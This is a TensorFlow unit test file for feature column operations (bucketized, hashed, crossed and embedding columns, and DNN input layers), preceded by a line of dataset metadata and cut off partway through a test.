from . import spvcm | 19.6 | 19 | 0.755102 | 15 | 98 | 4.933333 | 0.466667 | 0.675676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193878 | 98 | 5 | 20 | 19.6 | 0.936709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a49e14c08a3de2e010962a6e6ad5d4003e0addd | 101,433 | py | Python | tensorflow/contrib/layers/python/layers/feature_column_ops_test.py | jksk/tensorflow | 48fb73a1c94ee2409382225428063d3496dc651e | [
"Apache-2.0"
] | 2 | 2018-04-10T11:50:28.000Z | 2019-01-08T02:40:17.000Z | tensorflow/contrib/layers/python/layers/feature_column_ops_test.py | jksk/tensorflow | 48fb73a1c94ee2409382225428063d3496dc651e | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/layers/python/layers/feature_column_ops_test.py | jksk/tensorflow | 48fb73a1c94ee2409382225428063d3496dc651e | [
"Apache-2.0"
] | 6 | 2017-04-14T07:11:14.000Z | 2019-11-20T08:19:15.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.feature_column_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.contrib.layers.python.layers import feature_column_ops
from tensorflow.python.ops import init_ops
class TransformerTest(tf.test.TestCase):
def testRealValuedColumnIsIdentityTransformation(self):
real_valued = tf.contrib.layers.real_valued_column("price")
features = {"price": tf.constant([[20.], [110], [-3]])}
output = feature_column_ops._Transformer(features).transform(real_valued)
with self.test_session():
self.assertAllEqual(output.eval(), [[20.], [110], [-3]])
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[bucket])
self.assertEqual(len(output), 1)
self.assertIn(bucket, output)
with self.test_session():
self.assertAllEqual(output[bucket].eval(), [[2], [3], [0]])
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 110], [110., 20], [-3, -3]])}
output = feature_column_ops._Transformer(features).transform(bucket)
with self.test_session():
self.assertAllEqual(output.eval(), [[2, 3], [3, 2], [0, 0]])
def testCachedTransformation(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
transformer = feature_column_ops._Transformer(features)
with self.test_session() as sess:
transformer.transform(bucket)
num_of_ops = len(sess.graph.get_operations())
# Verify that the second call to transform the same feature
# doesn't increase the number of ops.
transformer.transform(bucket)
self.assertEqual(num_of_ops, len(sess.graph.get_operations()))
def testSparseColumnWithHashBucket(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
with self.test_session():
self.assertEqual(output[hashed_sparse].values.dtype, tf.int64)
self.assertTrue(
all(x < 10 and x >= 0 for x in output[hashed_sparse].values.eval()))
self.assertAllEqual(output[hashed_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[hashed_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseIntColumnWithHashBucket(self):
"""Tests a sparse column with int values."""
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket(
"wire", 10, dtype=tf.int64)
wire_tensor = tf.SparseTensor(values=[101, 201, 301],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
with self.test_session():
self.assertEqual(output[hashed_sparse].values.dtype, tf.int64)
      self.assertTrue(
          all(0 <= x < 10 for x in output[hashed_sparse].values.eval()))
self.assertAllEqual(output[hashed_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[hashed_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseColumnWithHashBucketWithDenseInputTensor(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(hashed_sparse)
with self.test_session():
# While the input is a dense Tensor, the output should be a SparseTensor.
self.assertIsInstance(output, tf.SparseTensor)
self.assertEqual(output.values.dtype, tf.int64)
      self.assertTrue(all(0 <= x < 10 for x in output.values.eval()))
self.assertAllEqual(output.indices.eval(),
[[0, 0], [0, 1], [1, 0], [1, 1]])
self.assertAllEqual(output.shape.eval(), [2, 2])
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(
tf.contrib.layers.embedding_column(hashed_sparse, 10))
expected = feature_column_ops._Transformer(features).transform(
hashed_sparse)
with self.test_session():
self.assertAllEqual(output.values.eval(), expected.values.eval())
self.assertAllEqual(output.indices.eval(), expected.indices.eval())
self.assertAllEqual(output.shape.eval(), expected.shape.eval())
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
def testSparseColumnWithKeys(self):
keys_sparse = tf.contrib.layers.sparse_column_with_keys(
"wire", ["marlo", "omar", "stringer"])
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[keys_sparse])
self.assertEqual(len(output), 1)
self.assertIn(keys_sparse, output)
with self.test_session():
tf.initialize_all_tables().run()
self.assertEqual(output[keys_sparse].values.dtype, tf.int64)
self.assertAllEqual(output[keys_sparse].values.eval(), [1, 2, 0])
self.assertAllEqual(output[keys_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[keys_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseColumnWithKeysWithDenseInputTensor(self):
keys_sparse = tf.contrib.layers.sparse_column_with_keys(
"wire", ["marlo", "omar", "stringer", "rick"])
wire_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(keys_sparse)
with self.test_session():
tf.initialize_all_tables().run()
# While the input is a dense Tensor, the output should be a SparseTensor.
self.assertIsInstance(output, tf.SparseTensor)
self.assertEqual(output.dtype, tf.int64)
self.assertAllEqual(output.values.eval(), [1, 2, 0, 3])
self.assertAllEqual(output.indices.eval(),
[[0, 0], [0, 1], [1, 0], [1, 1]])
self.assertAllEqual(output.shape.eval(), [2, 2])
def testSparseColumnWithHashBucket_IsIntegerized(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_integerized_feature(
"wire", 10)
wire_tensor = tf.SparseTensor(values=[100, 1, 25],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[hashed_sparse])
self.assertEqual(len(output), 1)
self.assertIn(hashed_sparse, output)
with self.test_session():
self.assertEqual(output[hashed_sparse].values.dtype, tf.int32)
      self.assertTrue(
          all(0 <= x < 10 for x in output[hashed_sparse].values.eval()))
self.assertAllEqual(output[hashed_sparse].indices.eval(),
wire_tensor.indices.eval())
self.assertAllEqual(output[hashed_sparse].shape.eval(),
wire_tensor.shape.eval())
def testSparseColumnWithHashBucketWithDenseInputTensor_IsIntegerized(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_integerized_feature(
"wire", 10)
    wire_tensor = tf.constant([[100, 0], [1, 25]])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(hashed_sparse)
with self.test_session():
# While the input is a dense Tensor, the output should be a SparseTensor.
self.assertIsInstance(output, tf.SparseTensor)
self.assertEqual(output.values.dtype, tf.int32)
      self.assertTrue(all(0 <= x < 10 for x in output.values.eval()))
self.assertAllEqual(output.indices.eval(),
[[0, 0], [0, 1], [1, 0], [1, 1]])
self.assertAllEqual(output.shape.eval(), [2, 2])
def testWeightedSparseColumn(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[weighted_ids])
self.assertEqual(len(output), 1)
self.assertIn(weighted_ids, output)
with self.test_session():
tf.initialize_all_tables().run()
self.assertAllEqual(output[weighted_ids][0].shape.eval(),
ids_tensor.shape.eval())
self.assertAllEqual(output[weighted_ids][0].indices.eval(),
ids_tensor.indices.eval())
self.assertAllEqual(output[weighted_ids][0].values.eval(), [2, 2, 0])
self.assertAllEqual(output[weighted_ids][1].shape.eval(),
weights_tensor.shape.eval())
self.assertAllEqual(output[weighted_ids][1].indices.eval(),
weights_tensor.indices.eval())
self.assertEqual(output[weighted_ids][1].values.dtype, tf.float32)
self.assertAllEqual(output[weighted_ids][1].values.eval(),
weights_tensor.values.eval())
def testCrossColumn(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=15)
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[country_language])
self.assertEqual(len(output), 1)
self.assertIn(country_language, output)
with self.test_session():
self.assertEqual(output[country_language].values.dtype, tf.int64)
      self.assertTrue(
          all(0 <= x < 15 for x in output[country_language].values.eval()))
def testCrossWithBucketizedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=15)
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[country_price])
self.assertEqual(len(output), 1)
self.assertIn(country_price, output)
with self.test_session():
self.assertEqual(output[country_price].values.dtype, tf.int64)
      self.assertTrue(
          all(0 <= x < 15 for x in output[country_price].values.eval()))
def testCrossWithMultiDimensionBucketizedColumn(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=1000)
with tf.Graph().as_default():
features = {"price": tf.constant([[20., 210.], [110., 50.], [-3., -30.]]),
"country": tf.SparseTensor(values=["US", "SV", "US"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[country_price],
num_outputs=1))
weights = column_to_variable[country_price][0]
grad = tf.squeeze(tf.gradients(output, weights)[0].values)
with self.test_session():
tf.global_variables_initializer().run()
self.assertEqual(len(grad.eval()), 6)
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[country_price])
self.assertEqual(len(output), 1)
self.assertIn(country_price, output)
def testCrossWithCrossedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=15)
wire = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_country_price = tf.contrib.layers.crossed_column(
[wire, country_price], hash_bucket_size=15)
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [0, 1], [0, 2]],
shape=[1, 3])
}
# Test transform features.
output = tf.contrib.layers.transform_features(
features=features, feature_columns=[wire_country_price])
self.assertEqual(len(output), 1)
self.assertIn(wire_country_price, output)
with self.test_session():
self.assertEqual(output[wire_country_price].values.dtype, tf.int64)
      self.assertTrue(
          all(0 <= x < 15 for x in output[wire_country_price].values.eval()))
def testIfFeatureTableContainsTransformationReturnIt(self):
any_column = tf.contrib.layers.sparse_column_with_hash_bucket("sparse", 10)
features = {any_column: "any-thing-even-not-a-tensor"}
output = feature_column_ops._Transformer(features).transform(any_column)
self.assertEqual(output, "any-thing-even-not-a-tensor")
class CreateInputLayersForDNNsTest(tf.test.TestCase):
def testAllDNNColumns(self):
sparse_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
real_valued_column = tf.contrib.layers.real_valued_column("income", 2)
one_hot_column = tf.contrib.layers.one_hot_column(sparse_column)
embedding_column = tf.contrib.layers.embedding_column(sparse_column, 10)
features = {
"ids": tf.SparseTensor(
values=["c", "b", "a"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1]),
"income": tf.constant([[20.3, 10], [110.3, 0.4], [-3.0, 30.4]])
}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_column,
embedding_column,
real_valued_column])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual(output.eval().shape, [3, 2 + 4 + 10])
def testRealValuedColumn(self):
real_valued = tf.contrib.layers.real_valued_column("price")
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval())
def testRealValuedColumnWithMultiDimensions(self):
real_valued = tf.contrib.layers.real_valued_column("price", 2)
features = {"price": tf.constant([[20., 10.],
[110, 0.],
[-3, 30]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval())
def testRealValuedColumnWithNormalizer(self):
real_valued = tf.contrib.layers.real_valued_column(
"price", normalizer=lambda x: x - 2)
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval() - 2)
def testRealValuedColumnWithMultiDimensionsAndNormalizer(self):
real_valued = tf.contrib.layers.real_valued_column(
"price", 2, normalizer=lambda x: x - 2)
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval() - 2)
def testBucketizedColumnSucceedsForDNN(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 0, 1, 0], [0, 0, 0, 1], [1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testBucketizedColumnWithNormalizerSucceedsForDNN(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column(
"price", normalizer=lambda x: x - 15),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 1, 0, 0], [0, 0, 1, 0], [1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testBucketizedColumnWithMultiDimensionsSucceedsForDNN(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
# buckets [2, 3], [3, 2], [0, 0]. dimension = 2
features = {"price": tf.constant([[20., 200],
[110, 50],
[-3, -3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0, 1, 0],
[1, 0, 0, 0, 1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testOneHotColumnFromWeightedSparseColumnFails(self):
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
ids_tensor = tf.SparseTensor(
values=["c", "b", "a", "c"],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
weighted_ids_column = tf.contrib.layers.weighted_sparse_column(ids_column,
"weights")
weights_tensor = tf.SparseTensor(
values=[10.0, 20.0, 30.0, 40.0],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
features = {"ids": ids_tensor, "weights": weights_tensor}
one_hot_column = tf.contrib.layers.one_hot_column(weighted_ids_column)
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
with self.assertRaisesRegexp(
ValueError,
"one_hot_column does not yet support weighted_sparse_column"):
_ = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_column])
def testOneHotColumnFromSparseColumnWithKeysSucceedsForDNN(self):
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
ids_tensor = tf.SparseTensor(
values=["c", "b", "a"], indices=[[0, 0], [1, 0], [2, 0]], shape=[3, 1])
one_hot_sparse = tf.contrib.layers.one_hot_column(ids_column)
features = {"ids": ids_tensor}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual([[0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 0, 0]],
output.eval())
def testOneHotColumnFromMultivalentSparseColumnWithKeysSucceedsForDNN(self):
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
ids_tensor = tf.SparseTensor(
values=["c", "b", "a", "c"],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
one_hot_sparse = tf.contrib.layers.one_hot_column(ids_column)
features = {"ids": ids_tensor}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual([[0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 1, 0]],
output.eval())
def testOneHotColumnFromSparseColumnWithIntegerizedFeaturePassesForDNN(self):
ids_column = tf.contrib.layers.sparse_column_with_integerized_feature(
"ids", bucket_size=4)
one_hot_sparse = tf.contrib.layers.one_hot_column(ids_column)
features = {"ids": tf.SparseTensor(
values=[2, 1, 0, 2],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])}
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual([[0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 1, 0]],
output.eval())
def testOneHotColumnFromSparseColumnWithHashBucketSucceedsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("feat", 10)
wire_tensor = tf.SparseTensor(
values=["a", "b", "c1", "c2"],
indices=[[0, 0], [1, 0], [2, 0], [2, 1]],
shape=[3, 2])
features = {"feat": wire_tensor}
one_hot_sparse = tf.contrib.layers.one_hot_column(hashed_sparse)
output = tf.contrib.layers.input_from_feature_columns(features,
[one_hot_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual([3, 10], output.eval().shape)
def testEmbeddingColumnSucceedsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(
values=["omar", "stringer", "marlo", "xx", "yy"],
indices=[[0, 0], [1, 0], [1, 1], [2, 0], [3, 0]],
shape=[4, 2])
features = {"wire": wire_tensor}
    embedded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
    output = tf.contrib.layers.input_from_feature_columns(
        features, [embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(output.eval().shape, [4, 10])
def testScatteredEmbeddingColumnSucceedsForDNN(self):
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo", "omar"],
indices=[[0, 0], [1, 0], [1, 1], [2, 0]],
shape=[3, 2])
features = {"wire": wire_tensor}
# Big enough hash space so that hopefully there is no collision
embedded_sparse = tf.contrib.layers.scattered_embedding_column(
"wire", 1000, 3,
tf.contrib.layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
output = tf.contrib.layers.input_from_feature_columns(
features, [embedded_sparse], weight_collections=["my_collection"])
weights = tf.get_collection("my_collection")
grad = tf.gradients(output, weights)
with self.test_session():
tf.global_variables_initializer().run()
gradient_values = []
# Collect the gradient from the different partitions (one in this test)
for p in range(len(grad)):
gradient_values.extend(grad[p].values.eval())
gradient_values.sort()
self.assertAllEqual(gradient_values, [0.5]*6 + [2]*3)
def testEmbeddingColumnWithInitializerSucceedsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
init_value = 133.7
    embedded_sparse = tf.contrib.layers.embedding_column(
        hashed_sparse, 10, initializer=tf.constant_initializer(init_value))
    output = tf.contrib.layers.input_from_feature_columns(
        features, [embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
output_eval = output.eval()
self.assertAllEqual(output_eval.shape, [2, 10])
self.assertAllClose(output_eval, np.tile(init_value, [2, 10]))
def testEmbeddingColumnWithMultipleInitializersFails(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embedded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
10,
initializer=tf.truncated_normal_initializer(mean=42,
stddev=1337))
embedded_sparse_alternate = tf.contrib.layers.embedding_column(
hashed_sparse,
10,
initializer=tf.truncated_normal_initializer(mean=1337,
stddev=42))
    # Make sure that using different initializers for the same embedding
    # column fails explicitly.
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
"Duplicate feature column key found for column: wire_embedding"):
tf.contrib.layers.input_from_feature_columns(
features, [embedded_sparse, embedded_sparse_alternate])
def testEmbeddingColumnWithWeightedSparseColumnSucceedsForDNN(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
    embedded_sparse = tf.contrib.layers.embedding_column(weighted_ids, 10)
    output = tf.contrib.layers.input_from_feature_columns(
        features, [embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual(output.eval().shape, [2, 10])
def testEmbeddingColumnWithCrossedColumnSucceedsForDNN(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
    embedded_sparse = tf.contrib.layers.embedding_column(crossed, 10)
    output = tf.contrib.layers.input_from_feature_columns(
        features, [embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(output.eval().shape, [2, 10])
def testSparseColumnFailsForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
with self.test_session():
with self.assertRaisesRegexp(
ValueError, "Error creating input layer for column: wire"):
tf.global_variables_initializer().run()
tf.contrib.layers.input_from_feature_columns(features, [hashed_sparse])
def testWeightedSparseColumnFailsForDNN(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
"Error creating input layer for column: ids_weighted_by_weights"):
tf.initialize_all_tables().run()
tf.contrib.layers.input_from_feature_columns(features, [weighted_ids])
def testCrossedColumnFailsForDNN(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
with self.test_session():
with self.assertRaisesRegexp(
ValueError, "Error creating input layer for column: aaa_X_bbb"):
tf.global_variables_initializer().run()
tf.contrib.layers.input_from_feature_columns(features, [crossed])
def testDeepColumnsSucceedForDNN(self):
real_valued = tf.contrib.layers.real_valued_column("income", 3)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"income": tf.constant([[20., 10, -5], [110, 0, -7], [-3, 30, 50]]),
"price": tf.constant([[20., 200], [110, 2], [-20, -30]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
    embedded_sparse = tf.contrib.layers.embedding_column(
        hashed_sparse, 10, initializer=tf.constant_initializer(133.7))
    output = tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
# size of output = 3 (real_valued) + 2 * 4 (bucket) + 10 (embedding) = 21
self.assertAllEqual(output.eval().shape, [3, 21])
def testEmbeddingColumnForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
features = {"wire": wire_tensor}
    embedded_sparse = tf.contrib.layers.embedding_column(
        hashed_sparse,
        1,
        combiner="sum",
        initializer=init_ops.ones_initializer())
    output = tf.contrib.layers.input_from_feature_columns(
        features, [embedded_sparse])
